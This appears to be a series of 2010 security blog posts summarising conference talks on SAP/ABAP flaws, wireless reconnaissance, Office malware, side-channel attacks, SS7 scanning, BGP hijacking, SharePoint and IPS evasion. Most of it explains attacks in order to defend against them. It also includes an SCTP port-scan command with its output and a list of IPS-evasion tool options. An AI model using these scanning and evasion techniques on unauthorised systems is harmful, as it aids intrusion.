-If an attacker obtains it, it can create authentication tickets for the victim system. Accepting these tickets is enabled per default. Attacker can logon as any user.
-The private key container (PSE) can be pin-protected
-Advice: Disable accepting tickets using relevant profile parameters!

SQL Injection-ABAP typically uses parametrized queries (Developers can still specify parts of sql statements dynamically by parentheses)
-Not dynamic: SELECT ColumnA FROM TableA INTO[...]
-Dynamic: SELECT(var_ColumName)FROM(var_TableName) INTO[...]WHERE(var_WhereClause)
-Avoid dynamic statements where possible!

Cross Site Scripting
-Proper sanitization/encoding of the input data is the key for self developed web code such as BSPs.
-If not done, an attacker can do everything related to XSS, plus steal e.g the SSO2 (Authentication) cookies from the clients SSO2 cookies are stateless so client impersonation is a breeze. Avoid using this mechanism without proper controls.
-If you have F5's or similar devices, encrypt cookies based on origin IP.

ABAP Executable Manipulation
-Statement: INSERT REPORT
-Writes custom code to any ABAP program
-It's even possible to call an editor to make it more user friendly
-Very suspicious if found in self-developed code

RS_REPAIR_SOURCE Executable
-Unpatched version does not have authorization checking.
-People with e.g SE38 rights can execute this and manipulate the system and data of it.
-Same as ABAP injection, only more convenient.
-SAP patched it via: SAP Note 1167258: Program RS_REPAIR_SOURCE

ABAP Rootkits
-It is possible to modify system executables (ABAPs)
-An attacker can easily infect important ones executables and install an ABAP rootkit
-SAP has RFC functions that do not require user authentication by default (SRFC Function Group). This could be one candidate.
-Installed rootkit can give anonymous access to the attacker with functionality such as: Installing
SAP_ALL users, Manipulating ABAP reports, Running OS commands, Stealing hashes or PSE files, Deleting Logs.

Triple-Penetration Attacks
Penetration 1: Attacker exploits the weakest system
-Typical enterprise setup: Testing/Development > Quality Assurance > Production
-Among them, most unprotected are test/development systems

Penetration 2: Attacker infects clients which connect to the weakest system
–Starts with modification/infection of the critical areas such as logon screen ABAP code
-When admins/developers successfully login, malicious payload is downloaded and executed on these users computers

Penetration 3: Victim infects all the systems it later connects to
-Modification of critical components of the newly accessed SAP systems (Internal production systems, Partner systems, critical systems)

How to stay secure
-Have proper "check-in" and "leavers process" that take the ABAP developer risks into consideration
-Audit the code against security vulnerabilities before transporting to production systems
-Syncing passwords to development systems means, possibility of developers to capture valid passwords for production systems. Avoid it!
-Get rid of insecure and/or default passwords
-Disable backwards compatiability of passwords
-Install the latest security patches

Wireless Reconnaissance in Practice

2010-10-27T22:50:00.000-04:30

Kismet (stable, devel and newcore)
Locate / Identify AP(s)
-BSSID, ESSID, Channel and Encryption
-GPS data
Locate / Identify Client(s)
-MAC Address
-Manufacturers
Perform Spectrum analysis
Drones / open-source WIPS

Aircrack-ng – Cracking WEP and WPA
-Suite of tools for wireless testing
-Mostly thought for wireless cracking
-Can also be used for wireless recon
-IE Airodump-ng

Netstumbler
-All for the Win32 geeks.

Types Reconnaissance Data
Kismet-(stable|devel) – Txt, CSV, XML, GPS and pcap
Kismet-newcore – Txt, NetXML, GPS and pcap
Aircrack-ng – CSV, pcap, XML

Wireless Recon Visualization Tools
-Gpsmap (ancient)
-Pykismet
-Kismet-earth
-kisgearth

Limitations of Visualization Tools
-None work with Kismet-newcore
-None work with Aircrack-ng
-Flexible representation of specific information (total flexibility in the generated graphs).

Analyzing Malware Through MS-Office Documents

2010-10-12T10:57:00.000-04:30

Key Highlights
-MS Office commonly exploited since 2006
-Existing exploits in the wild exploit unexceptional the older OLESS file format.
-Currently no known bugs in the newer XML based MS Office format.

Some MS Office exploits since 2006
-CVE-2006-0009 Powerpoint MS06-012 (March 2006)
-CVE-2006-0022 Powerpoint MS06-028 (June 2006)
-CVE-2006-2492 Word MS06-027 (June 2006)
-CVE-2006-3434 Powerpoint MS06-062 (October 2006)
-CVE-2006-3590 Powerpoint MS06-048 (August 2006)
-CVE-2006-4534 Word MS06-060 (October 2006)
-CVE-2006-4694 Powerpoint MS06-058 (October 2006)
-CVE-2006-5994 Word MS07-014 (February 2007)
-CVE-2006-6456 Word MS07-014 (February 2007)
-CVE-2007-0515 Word MS07-014 (February 2007)
-CVE-2007-0671 Excel MS07-015 (February 2007)
-CVE-2007-0870 Word MS07-024 (May 2007)
-CVE-2008-0081 Excel MS08-014 (March 2008)
-CVE-2008-4841 Word MS09-010 (April 2009)
-CVE-2009-0238 Excel MS09-009 (April 2009)
-CVE-2009-0556 Powerpoint MS09-017 (May 2009)

Generic OLESS Format
-OLESS Header
-FAT FS: SectorNumbers, OLESS directory entries
-Data is divided into directories (storages) and files (streams)
-Depending on the application streams may contain: Macros, Graphics, Tables, Sounds, Animations, etc.
-Parsing can be done using the Win32 COM API: StgOpenStorage(), IStoragemethods, IStreammethods.

Malicious Document Structure

Typical MS-Office Shellcode Behavior

When a bug in a MS Office application gets triggered:
-Shellcode executes
-Finds itself by open file handles enumeration and file size checking
-SetFilePointerto encrypted PE-File(s), decrypt, drop and execute
-Drop harmless embedded MS Office document and start to look innocent

More information:
-Not much public information about MS-Office malware analysis available
-Microsoft Office Binary File Format Specification (since Feb. 2008)
-Bruce Dang's talk "Methods for Understanding Targeted Attacks with Office Documents".

Available Tools For Analysis
-DFView (old school Microsoft OLE structure viewer)
-Officecat (signature based CLI utility)
-FlexHexEditor (OLE compound viewer)
-OffVis (office binary file format visualization tool)
-OfficeMalScanner (forensic tool for analysts to find malicious traces in MS Office documents)

Analyzing Side Channel Attacks on Embedded Systems

2010-08-25T18:28:00.000-04:30

General embedded systems based on micro-controller and complex processors:
-USB sticks
-Car locks
-Remote access tokens
-Mobile devices
-Game consoles
-Multi-media chipsets for pay-TV

Think of Security:
-What is the threat from side channel analysis to embedded systems?
-How does it compare with attacks on smart cards?
-What are the future developments?

Attacking Side Channels
-Time
-Power consumption
-Electro-Magnetic radiation
-Light
-Sound

Power/EM traces
-Signal leakage from busses, registers, ALUs, etc.

Statistical data detection
-Where is data processed in presence of noise?
-Collect many traces with different data (n > 1000)
-Assume data values are:
known (e.g. algorithm input or output)
uniformly random (typical for crypto)
-We focus on one bit of one variable in the process

Differential trace
-Input: n traces with known variable (e.g. input or output)
-Output: 1 trace with indication where bit causes trace differences

Purpose of Side Channel Attacks on Embedded Systems
-Retrieve secrets (Key, PIN, Unlock code)
-Reverse engineer (Program flow, Crypto protocol, Algorithm)

Why Side Channel Attacks are interesting? If side channel threats depends on:
-Physical access?
-Access time window?
-Interfacing and control?
-Exploitation equipment $?

A device becomes interesting when:
-It contains a secret
-It contains a feature that can be unlocked
-Logical or physical access to internals is hard

Typical Side Channel Attack Example

Typical Prerequisites
-Access to side channel
-Access to input or output data
-Minimize noise in side channel
-Time measurement of operation (trigger)
-Link data to operation

Processor comparison with Smart Card

Acquisition comparison with Smart Card

Test vs. Attack
-An attacker needs to turn a vulnerability into an exploit
-A tester needs to gain insight in attacker cost efficiently
-How to create the optimal environment to discover a vulnerability?

General aspects of testing
-Controlling the crypto
-Linking data with measurements
-Efficiency of acquisition
-Increased speed versus increased complexity

Timing analysis
-Peripheral outputs assist (example XBOX 360)
-Exploiting runtime access (cache)
-Increasing accuracy with EM and power
-Timing is a risk in many software implementations: both crypto and comparisons

XBOX 360 with Backdoor

-XBOX 360 has a secure boot chain
-First boot loader security implemented with a HMAC-SHA1
-Hash secret key + boot loader with SHA1
-Compare 16 bytes result with stored 16 bytes
-Comparison is per byte -> timing attack
-Implementation in this infectus board:
    It can modify stored HMAC-SHA1 value in NAND flash
    Observes timing of diagnostic POST byte on PCB
    Reset CPU with nTRST
-Brute forcing 16*128 = 2048 values on average takes about 2 hrs

Power analysis
-Tapping power or supplying it
-Reaching rails
-Identifying the correct supply rail
-Disabling power domains
-Disabling peripherals
-All require more detailed knowledge on target

EM (Electro Magnetic) Analysis
-EM signal adds dimension
-How to locate?
-When can EM be better?
-EMA is an active research topic
-EM seems to add most when target operation is small relative to overall chip

Threat and Impact
-Few countermeasures
-Significant leakage
-Fast acquisition
-Required level of control
-Attacks needed to achieve control
-High noise level, increased acquisition times

Countermeasures
Hardware
-Random Interrupts
-Data / Key masking
-Shielding
-Balancing

Software
-Randomizing flow
-Blinding / Masking
-Algorithm
-Protocol design

Scanning SS7 Networks and Telecom Backbones

2010-08-09T19:45:00.002-04:30

Historic View
-Phreaking is a term for the action of making a telephone system do something that it normally should not allow.
-Telecommunications security problems started in the 1960’s when the hackers of the time started to discover ways to abuse the telephone company.
-Discovery and exploration of features of telecommunications systems.
-Controlling Network Elements (NE) in a way that was not planned by its designers.
-Abusing weaknesses of protocols, systems and applications in telephone networks.

Fraud Implanted by
-Blue Box
-Internal Fraud

Reliability
-US: 911, Europe: 112
-How much lost revenue is one minute of downtime?

Today's View
-SIP account hacking, remind the "Calling Cards" fraud?
-VoIP GW hacking, remind the "PBX hacking"?
-Signaling hacking directly on SS7 – SIGTRAN level

SS7 Attacks Scenarios
-Theft of service, interception of calling cards numbers, privacy concerns
-Introduce harmful packets into the national and global SS7 networks
-Get control of call processing, get control of accounting reports
-Obtain credit card numbers, non-listed numbers, etc.
-Messages can be read, altered, injected or deleted
-Denial of service, security triplet replay to compromise authentication
-Annoyance calls, free calls, disruption of emergency services
-Capture of gateways, rerouting of call traffic
-Disruption of service to large parts of the network
-Call processing exposed through Signaling Control Protocol
-Announcement service exposed to IP through RTP
-Disclosure of bearer channel traffic

Telecom Backbone

Discovering The Backbone
Deregulation
-Europe / US: CLEC vs ILEC

New services and new business partners
-Premium numbers, SMS providers, etc.

Push toward an “All IP” infrastructure
-Management network
-Cost
-SIGTRAN (SS7 over IP)

SS7 & SIGTRAN
-Core
-Formerly, the walled garden

VoIP
-Edge
-Hard to make it reliable (QoS, SBCs)

SS7 and IP
-There is also exponential growth in the use of interconnection between the telecommunication networks and the Internet, for example with VoIP protocols (e.g. SIP, SCTP, M3UA, etc.)
-The IT community now has many protocol converters for conversion of SS7 data to IP, primarily for the transportation of voice and data over the IP networks. In addition new services such as those based on IN will lead to a growing use of the SS7 network for general data transfers.
-There have been a number of incidents from accidental action on SS7, which have damaged a network. To date, there have been very few deliberate actions. Far from VoIP here.

Attacking SIGTRAN with SCTPscan (http://sctp.tstf.net/)
Where implementation diverge from RFCs
-RFC says "hosts should never answer to INIT packets on non-existings ports".
-Syn scanning is slow when no RST

Below the IDS
-How many firewall logs dropped SCTP packets?
-How many IDS(s) watch for SCTP socket evil content?
-Example: Dshield.org - Real life distributed IDS, Hundreds of thousands of IP scanned, nor detected neither reported as scanner.

INIT vs SHUTDOWN_ACK Packet Scanning
From RFC 2960
-8.4 Handle "Out of the blue" Packets
-An SCTP packet is called an "out of the blue" (OOTB) packet if it is correctly formed, i.e., passed the receiver's Adler-32 / CRC-32 check (see Section 6.8), but the receiver is not able to identify the association to which this packet belongs.
-The receiver of an OOTB packet MUST do the following:
"If the packet contains a SHUTDOWN ACK chunk, the receiver should respond to the sender of the OOTB packet with a SHUTDOWN COMPLETE."

-New way to elicit answers even if not answering ABORTs to INITs targeted at not-opened port.

SCTP ports (-sS) Stealth Scanning
root@bt:~/sctp# ./sctpscan-v11 --scan --autoportscan -r
203.151.1
Netscanning with Crc32 checksumed packet
203.151.1.4 SCTP present on port 2905
203.151.1.4 SCTP present on port 7102
203.151.1.4 SCTP present on port 7103
203.151.1.4 SCTP present on port 7105
203.151.1.4 SCTP present on port 7551
203.151.1.4 SCTP present on port 7701
203.151.1.4 SCTP present on port 7800
203.151.1.4 SCTP present on port 8001
203.151.1.4 SCTP present on port 2905
root@bt:~/sctp#

SCTP Stack Fingerprinting
-SCTP stack reliability
-Robustness testing (stress testing)
-QA of a few stacks
-Fuzzing built-in SCTPscan
-Discrepancies in SCTP answer packets
-Different stack behaviours
-Much more states than TCP=opportunities
-Cookie randomness

Credits: Philippe Langlois, P1 Security (p1security.com)

Using DAVIX For Security Visualization (revised)

2010-08-02T13:28:00.000-04:30

Information visualization
-Visualize large collections of abstract data

Scientific visualization
-Representation of data with geometric structure

Visualization Concept
-Analyzing floods of data in tabular or textual form is tedious
-Humans must sequentially scan such data
-Visualization exploits the human's visual perceptive capabilities and parallel processing Size, Shape, Distance, and Color
-Easy to spot patterns and irregularities

Data types supported
-Ordinal
Has a sequence e.g. day of week
-Nominal
Has no sequence e.g. types of fishes
-Quantitative
Can be measured e.g. length, time, weight, temperature, speed

Visualization Effectiveness
-Each data type has its most effective way of visualization

Information Visualization Process

DAVIX Linux Distribution (http://davix.secviz.org/)
-Provide the audience with a workable and integrated tools set
-Enable them to immediately start with security visualization
-Motivate them to contribute to the security visualization community

Tools Available
Capture
-Network Tools (Argus, Snort, Wireshark)
-Logging (syslog-ng)
-Fetching Data (wget, ftp, scp)

Processing
-Shell Tools (awk, grep, sed)
-Visualization Preprocessing (AfterGlow, LGL)
-Extraction (Chaosreader)
-Data Enrichment (geoiplookup, whois, gwhois)

Visualization
-Network Traffic (EtherApe, InetVis, tnv)
-Generic (AfterGlow, Cytoscape, Graphviz, LGL Viewer, Mondrian, R Project, Treemap)

Interface Transport
-Each visualization tool has its own file format interfaces
-Data must be converted to match the import interfaces
-These adapters are mostly self-written snippets of code

Important Note:
All the images presented in this post are intellectual property of the copyright owner (www.secviz.org)

Defending BGP MITM (Man-In-The-Middle) Attacks

2010-06-22T16:49:00.000-04:30

Every organization owes its Internet connectivity to one protocol: BGP4. There are no alternatives. BGP4 has longstanding vulnerabilities that cannot be fixed, and can only be monitored carefully.

Two key points:
1. Everyone who connects to the Internet is currently exposed to various routing risks: downtime, hijacking and now even wholesale traffic interception.
2. Very few people understand these risks, so they are not being measured or managed appropriately.

Basics of routing and the inherent threats:
-Prefixes
-ASNs
-Routing updates
-Route attributes
-Vulnerabilities & typical historical attacks

Internet Routing – Prefixes
-Internet routing is orchestrated via blocks of IP addresses.
-A network prefix is a block of contiguous IP addresses.
-IP addresses in the same prefix are routed in the same way.

Internet Routing – ASNs
Global Internet routing relies on the Border Gateway Protocol. Each organization participating in BGP is assigned:
-A unique Autonomous System Number or ASN (integer)
-One or more prefixes (range of IP addresses)
-All routing decisions are local

BGP Update Messages
-An UPDATE message announces a new route or withdraws a previously announced route. UPDATE = prefix + route attributes
-Adjacent routers chatter constantly with each other as routes come and go. Globally, Renesys observes 45,000+ updates per minute when things are quiet!

BGP Attributes
Routing announcements have attributes and many possibilities but the (hopefully valid) "AS" path to the announced prefix is always present.

Routing Vulnerabilities
1. No single authoritative source of who should be doing what.
-If there were, you could filter out the errors / hijacks.
-As a result, filtering by ISPs is not common or easy.

2. All of Internet routing is based on trust.
-Anyone can announce any IP space they want.
-Anyone can prepend any ASN to any path that they want.

3. No mechanism in place to handle ASNs who go rogue. There are no Internet police!

Two typical types of hijacks:

No operational impact
-Hijack unused (but maybe assigned) IP space
-Potentially harms the reputation of the owner
-But does not disrupt any legitimate traffic on the Internet
-DoD owns but does not announce 7.0.0.0/8, 11.0.0.0/8, 30.0.0.0/8 and others. These networks
are “free for the taking” without any impact on DoD. Every announcement in this space is a hijack.

Obvious operational impact
-Hijack currently used IP space
-Legitimate traffic diverted to the hijacker
-Victim can be effectively taken off the Internet
-Very disruptive and very obvious
-YouTube owns 208.65.152.0/22 (Feb 2008)
This contains the more-specific 208.65.153.0/24
The above /24 used to contain all of YouTube’s
DNS Servers (have since moved)
Web Servers (have since added additional IP space)
YouTube announced only the /22
-Pakistan Telecom announces the /24
In BGP, most specific route to an IP address wins!
Pakistan Telecom gets all traffic intended for YouTube
YouTube is globally unreachable for 2 hours

Both types of hijack allow an attacker to attract all traffic bound for the hijacked space.

Final Evaluation
-Hijacking has been going on for over 10 years!
-No incremental or comprehensive solutions
-Solutions lack economic drivers
-Doesn’t happen daily and universally
-Avoiding negative publicity is not necessarily compelling
-Impact poorly understood by management
-Miscreants are actively hijacking now
-To send spam from “clean” IP blocks
-To cover their other nefarious activities
-What good are your firewall/IDS logs now?
-Need historical global routing data to identify hijackers

Man-In-The-Middle Attack
-Review the MITM exploit presented at DEFCON 16 (August 10, 2008)
-AS path attribute
-AS loop prevention
-MITM attack technique
-Obscuring the MITM attack with TTL adjustment

How can the victim observe this?
-Victim’s routes and those of at least one provider will look normal
-Traceroute from a public looking glass to the victim’s IPs will show the hijacker
(assuming the looking glass hasn’t been blinded to the attack).
-Traceroute depends on incrementally increasing TTLs
-Hijacker can hide his presence by silently increasing TTLs for packets intended for the victim
-Hides hijacker’s routers
-Hides hijacker’s outbound routes to victim

Detecting the Attack
-Is this generally visible?
-Attacker profile
-Difficulties with detection
-You know the correct routing policies (easy)
-Generally limited to networks under your control
-Review of available alarm services
-Can you attack the alarm services?
-You don’t know the routing policies (hard)
-A proposed global detection technique

Difficulties in observing the MITM attack
-Most Internet routers will see and prefer the hijacked routes. Won’t be obvious among their
270,000+ routes.
-Traceroutes won’t show the hijacking (with TTL adjustments). Independent of source location.
-Latency to the victim will increase. Could be slight if the hijacker isn’t far from the victim.
-Route alarming services might see this if AS loop detection is disabled.

Two simple questions:
Can I detect MITM for my network?
-Easy: Routing policy is presumably known or at least knowable.

Can I detect MITM for the Internet at large?
-Much harder: Routing policies are not known and probably unknowable for all 270,000+ prefixes

Breaking Into SharePoint Portal

2010-05-31T17:55:00.000-04:30

Windows SharePoint Services (WSS)
- Base technology
- Free (with Windows Server)
- Consists of an ASP.NET web site and ISAPI filter

Microsoft Office SharePoint Server (MOSS)
- Built on top of WSS
- Not free
- Supports collaboration on MS Office documents

Security Aware?
- Gartner predicts SharePoint will replace network file shares
- Default security model: all site users have read access to all documents
- Big target – single repository for sensitive corporate data – salaries, phone numbers, customer lists, passwords, strategic plans, etc.

Hacking the SharePoint ISAPI Registry
A potential EoP, but not interesting:
- Requires Terminal Services to be enabled with “NT4 compat mode”
- In that scenario, several Windows components have the same bug
- See “Web Server Extensions”, referenced in HKLM
- Check out usage of “Terminal Server User” SID throughout Windows

Hacking SharePoint with Google
- Thousands of public, internet-facing SharePoint sites have been created
- Use Google to identify configuration mistakes
- More info: http://tinyurl.com/4dccn9

Hacking SharePoint with NMap
- SharePoint servers have a distinctive network port signature
- Depends on firewall config, of course
- More info: http://tinyurl.com/3oykwp

Hacking SharePoint with RegEx
SharePoint RegEx Search
- http://www.codeplex.com/MossRegExSearch
- See blog post – http://tinyurl.com/4s49p3
- Avoid limitations of built-in SharePoint search (i.e., SQL ‘LIKE’ and ‘CONTAINS’ keywords)
- Instead, harness the power of regular expressions!
- Search for: strong passwords, credit card info, phone numbers, SSNs, etc.

Defeating OS Fingerprinting Using IpMorph

2010-04-30T02:27:00.004-04:30

IpMorph is an Open Source project used to disguise OS-detection process performed using various techniques, such as, banner grabbing, ICMP replies, ISN profile, TCP headers, timeouts and other similar trends. These techniques are usually available in number of tools like Nmap, Xprobe2, SinFP, Ring2, p0f, Ettercap, etc.

Active Stack Fingerprinting

Passive Stack Fingerprinting

How IpMorph Works

Spoofing States

Filtering
– Stealth patch : Unmaintained as of 2002, GNU/Linux kernel 2.2-2.4
– Blackhole : FreeBSD, kernel options
– IPlog : Unmaintained as of 2001, *BSD
– Packet filter : OpenBSD
Host TCP/IP stack tweaking
– Ip Personality
– Fingerprint opt
– Fingerprint scrubber
– OSfuscate
Host TCP/IP stack replacement (proxy behaviour)
– Honeyd
– Packet purgatory / Morph
Integrated Tools
–IpMorph (Core)
–IpMorph Controller
–IpMorph Personality Manager
–IpView (IpMorph GUI)
Portability
–GNU/Linux
–BSD, Mac OS

IpMorph General Architecture

Insights of the CyberCrime World

2010-04-18T17:32:00.000-04:30

Malware Trends
-High complexity of technology introduces higher number of fault (Hardware, Software)
-Proof of Concept, Exploit Codes, Vulnerabilities (Finding exploits in order to misuse them, making money!)
-Today's Malware (Organized in botnets, uses human vulnerabilities)
-Botnets (Money making operation by selling stolen credentials, renting out botnet services like DDoS, Adware installations, etc)

Anti-Malware Solutions

The decision about the detection of malware (adware, spyware, trojan, etc) can be troublesome. It can be difficult to give a reason why any software is malicious, unwanted or not useful. However, implementing detection mechanism can be rather easy but there is an exception to this rule. Additionally, there is always a need for the cooperation between AV companies to avoid ambiguous decisions. This can be established by introducing standards and best practices such as AVPD, ASC, AMTSO, etc.

Detection vs Decision in Terms of Malware

Malware Distribution Channels

Trojan or Normal Application?

Trojan
-Uncompromising infection
-Make use of exploits
-Unattended, unsolicited installation
-Perform stealth activities
-Invasiveness
-Impact on system stability, security and integrity
-Obfuscated data
-Detection evasion mechanism

Normal Application
-The application itself isn't causing any harm
-EULA, the installation take place with user's consent
-The vendors disclaim involvement with the distribution channels

Vendors doesn't want their application to be detected

Final Outlook of the Malware

Legal and Problematic Issues

-Applications developed by well-established companies roll out with different affiliate distribution
model. Now, typically with botnet era?
-Mutual customers: those who want to use software and be protected at the same time.
-Other customers: those who never agree to install anything without their trustful consent.
-Uncontrolled open affiliate distribution model is unfeasible.
-Direct sponsorship for cybercrime activities.
-Once detected, these criminal groups are ready to fight even for the price of lawsuit.

Over the Past 4-years (according to Eset AV Press)
-20+ cases where the legal department has been involved
-Over 1150 hours and 530 employee interactions
-2006: 16 hours/month, 6 total interactions
-2009: 46 hours/month, 21 total interactions

Dissecting Malicious Office Documents

2010-04-01T01:57:00.001-04:30

In the past, malware was only appearing as an executable file but this threat has changed its landscape to skew through the application data files which includes, pdf, doc, xls, etc. In order to combat this threat, MalOffice has introduced a combination of both "static" and "dynamic" analysis techniques to inspect the application data files. The static analysis uses general and filetype-dependable scanning while the dynamic analysis uses the approach of CWSandbox and other test analysis techniques.

Static Analyzers
General:
-AV Scanner
-PE-Detector

Specialized:
-Detect embedded javascript in PDF document
-Heuristics for malicious javascript
-Detect shellcode in Office documents

PDFScanner
Specialized scanner for PDF files
-Decompose PDF stream into objects (pdftoolkit)
-Detect javascript objects
-Use heuristics to detect malicious javascript
-Extract Variable names
-Find code obfuscation
-Usage of known vulnerable functions

OfficeMalScanner
Specialized scanner for MS Word files
-Uses OfficeMalScanner, by Frank Boldewin (http://www.reconstructer.org)
-Forensic tool for Office documents
-Scans for shellcode pattern
-Dumps OLE structures and VB-macros
-Generates a malicious index value

Limitations
Static analyis can be circumvented by attacker
-different kinds of obfuscation are possible
-general drawbacks of static malware analysis
-exploit might trigger only on certain events
-Exploit might require specific version

Dynamic Analyzers

CWSandbox
-Tool for automated behavior analysis
-PE-executables or arbitrary data files
-Creates XML analysis report: operations executed by the monitored processes
-Filesystem, registry, network, user management,services, protected storage, etc
-Each file type has associated host application e.g. Acrobat Reader, Foxit Reader, MS Word, etc
-Some exploits only trigger in specific app versions e.g. Acrobat Reader 8.0, 8.1.0, 8.1.1, 9.0
-Task: decide from analysis report, if executed data file is malicious based on "Policies"
-consist of white and blacklisted operations
-created in a semi-automated way
-One policy per host application version
-What operations are usually perfomed when running this application with a (benign) data file?

Static Analysis Result (suspicious points)

Dynamic Analysis Result (malicious points)

Other Tools
SPARSE - focus only on Word documents
OfficeCat - static scanner for office documents
OfficeMalScanner - MS office forensic tool
Wepawet - powerful tool to analyze PDF and Flash files

Reverse Engineering Through Inline Hooking

2010-03-23T07:06:00.001-04:30

Reverse Engineering techniques are generally divided into two broad categories:
1. Static Analysis
2. Dynamic Analysis

Static Analysis
-Techniques which do not involve running the code
-Disassembly, file structure analysis, strings, etc.

Dynamic Analysis
-Techniques which involve running the code
-Behavioral analysis

Approaches to Dynamic analysis involve:
-Network Monitoring
    Isolated Physical Networks
    Virtual Networks
-Hardware Emulation
    Norman Sandbox, etc.
-Kernel-Level Monitoring (SSDT hooks)
    Sysinternal Process Monitor
-Debuggers

Kernel-Level Monitoring

Advantages
      Captures every system call
    Can’t be avoided from userland
Disadvantages
    Only captures functions implemented as system calls
    Not every important function call in the Win32 API is implemented as a system call
    Tools don’t differentiate between process housekeeping and calls from usercode
    Calls to internal DLL’s cannot be observed

Process Monitoring via Debugging

Advantages
    Debugger can trap any function call, not just system calls
    Trapped calls are more likely to be highly relevant to the program’s operation
Disadvantages
    Have to act as a debugger
    Susceptible to countless anti-debugging techniques

Inline Hooks

Advantages
    Can trap any function call, not just system calls
    Trapped calls are more likely to be highly relevant to the program’s operation
    Not operating as a debugger
    No device driver required

Disadvantages
Hard to implement

Implementing Inline Hooks

1. Find a function of interest
2. Disassemble the beginning of the function
3. If possible, overwrite the beginning bytes of the function with a jump or call instruction
4. Implement a handler for the hooked function

What to do with hooked functions?

Observe and Report
    Collect data about the current function call by gathering data from stack and report to console
    Execute any instructions overwritten from the hook
    Jump back to the next instruction in the hooked function
Intercept and Emulate
    Perform a specified action instead of calling the intended function

Running your own Sandbox

-Trap gethostbyname() to always return a fixed IP address.
-A pseudo-handle interface to allow fake reads and writes to files and netwok sockets. Trap connect() to connection to a pseudo-socket. CreateFile(), ReadFile(), WriteFile(), etc.

API Thief Tool (by mandiant.com)

-Launches target process in a suspended state
-Injects a DLL into the process.
-The Injected DLL hooks all Win32 API functions before the target process is resumed
-API Call monitoring can be used simply with a process monitor-style console
-Embedded python can be used to write custom handlers for specific hooked functions

Network Intrusion: The Advanced IPS Evasion Techniques

2010-02-27T14:01:00.005-04:30

As most of you may know that the Intrusion Prevention Systems (IPS) should protect vulnerable hosts from remote exploits. However, there are occassions where exploits can apply multiple evasion methods to bypass these detection mechanisms and break into the system. There are many hacking tools which apply multiple IDS/IPS evasion techniques but these tools are more exploit oriented rather than evasion oriented.

Known Evasion Techniques

-IP Fragmentation with manipulated fragment size and order
-IP Random Options
-TCP segmentation with manipulated segment size and order
-TCP Time Wait
-TCP Urgent Pointer
-SMB Fragmentation
-SMB Transaction Write Method
-SMB Write/Read Padding
-SMB Transaction Method fragmentation
-SMB Session Mixing
-MSRPC Multibind (bind to multiple unnecessary or non-existent context + the vulnerable context)
-MSRPC fragmentation
-MSRPC encryption
-MSRPC Alter Context
-MSRPC Object Reference
-MSRPC Endian Manipulation

Evasion Method

IPS signatures can be evaded completely if the protocol stacks do not understand the evasions and normalize the traffic over the network. For example, SMB and MSRPC signatures should not worry about fragmentation, padding, extra methods or other randomizations. More of these examples are discussed below.

IP Random Options

-Fill IP Packet with random Options
-If the target host and the IPS device disagree about the validity of the packet, the target host may see different data than the IPS.

TCP Time Wait

-Open and close a TCP connection. Open a new TCP-connection to the same service using the same TCP-source port. According the TCP RFC, the TCP client MUST wait "TIME-Wait Delay" amount of seconds before reusing a port.

-If the attacker uses his own TCP/IP Stack, he can open and close a TCP-connection and immediately open a new TCP connection using the same source port.

TCP Urgent Pointer

-Insert one byte into a TCP-stream.
-TCP-Server chooses whether to use or discard the added byte.
-An IPS device inspection can be evaded by clever use of the urgent pointer.
-Example: TCP Stream: GETP / (P is urgent data)
IPS looks: GETP /
Apache looks: GET /

SMB Session Mixing

It is possible to use multiple resources over the same SMB-session within the single TCP-connection at same time. Simultaneously read and write into multiple files.

SMB Write/Read Padding

-The write and read commands have an offset pointer that can be used for padding.
-All data after the SMB header till the pointed byte should be discarded.

MSRPC Alter Context

The client may change the current context using the Alter Context Method. All subsequent requests then go to the new context.
Example: The client binds to non vulnerable context and then changes into a vulnerable context and sends the exploit.

MSRPC Object Reference

Adding an Object Reference (UUID) to an MSRPC Request Header enlarges the header by 16 bytes, and thus moves the MSRPC payload 16 bytes forward.

IPS Evasion Tool - Predator (IPForge)

-Evasions for attack "CVE-2008-4250"

-IP fragmentation, --ip_frag:
8byte: Fragment IP payload into 8 byte fragments
16byte: Fragment IP payload into 16 byte fragments
24byte Fragment IP payload into 24 byte fragments
256byte Fragment IP payload into 256 byte fragments
random_order: Send fragments in a random order
out_of_order: Send one fragment out of order
fwd_overwrite Perform forward overwriting with fragments
last_first Send last fragment first
one_duplicate Send one duplicate fragment

-IP evasion, --ip_evasion:
random_options: Send random IP options

-TCP fragmentation, --tcp_frag:
1byte Fragment TCP payload into 1 byte segments

-TCP evasion, --tcp_evasion:
time_wait Open a decoy connection and attack from same ip:port while in time-wait
urgent_ptr Insert meaningless data into 1 byte urgent segments

-SMB fragmentation, --smb_frag:
16byte Fragment SMB payload into 16 byte fragments
256byte Fragment SMB payload into 256 byte fragments

-SMB evasion, --smb_evasion:
andx_connect Negotiate SMB session and connect to a tree connect an AndX message
decoy_trees Open decoy SMB tree connects in the same TCP stream as the attack
read_offset Use random offsets in SMB read operations
pad_write_random Pad SMB write commands with a random sized block of random data
pad_write_static Pad SMB write commands with a static sized block of random data
random_write_method Use a random SMB write method ( TRANSACT / WRITE )
write_offset Use random offsets in SMB write operation

-MSRPC fragmentation, --msrpc_
frag: 16byte Fragment MSRPC payload into 16 byte fragments
256byte Fragment MSRPC payload into 256 byte fragments

-MSRPC evasion, --msrpc_evasion:
big_endian Communicate in big endian format
random_object: Add a random object reference to MSRPC requests
alter_context: Bind to a random context and then alter to the correct ip

Analyzing Malware Using Advanced Inspection Procedures

2010-02-19T06:33:00.005-04:30

Why you want to analyze the malware? What could be the possible reasons?

-Better understanding of threats to protect network
-To write software that detects malware (anti-virus vendor)
-Admiration of new techniques
-Financial Gain (malware writer)
-Political agenda
-Used to be for the challenge and pranks

Characteristics of the good Malware Analyst

-Meticulous data collection
-Thinks outside the box
-Logical processes interaction
-Tenacious
-Good understanding of systems/network
-Reverse engineering skills

Attack Vectors

-Via portable devices
-Downloads from FTP or BBS
-Exploitation of remote services, worms
-System is only as strong as its weakest link

Human Factors

-In the past, humans not involved in the attack cycle
-Attackers searched for network or systems level vulnerabilities
-Automatic exploitation and spread
-In the present, exploit human (Spam email, compromise a legitimate site, advertising attacks)

Attacking through Social Networks

-All social networks have their history (Flickr, Facebook, Twitter, Myspace, Orkut)
-File sharing (Torrents, warez stuff, p2p)
-Massive information sharing networks
-Rich media content (web 2.0)

Attack Lifecycle

-Initial payload is small
-Initial checks (Mutex, OS Version, Keyboard, location)
-Payload is downloaded
-Contacts command and control server for tasks
-May fall back to secondary C&C
-Dynamically generate rendezvous point

Basic Obfuscation Techniques

-Polymorphism and Packers (UPX, Armadillo or custom packers)
-Simple Debugger checks
-Jumping into data/ middle of instructions
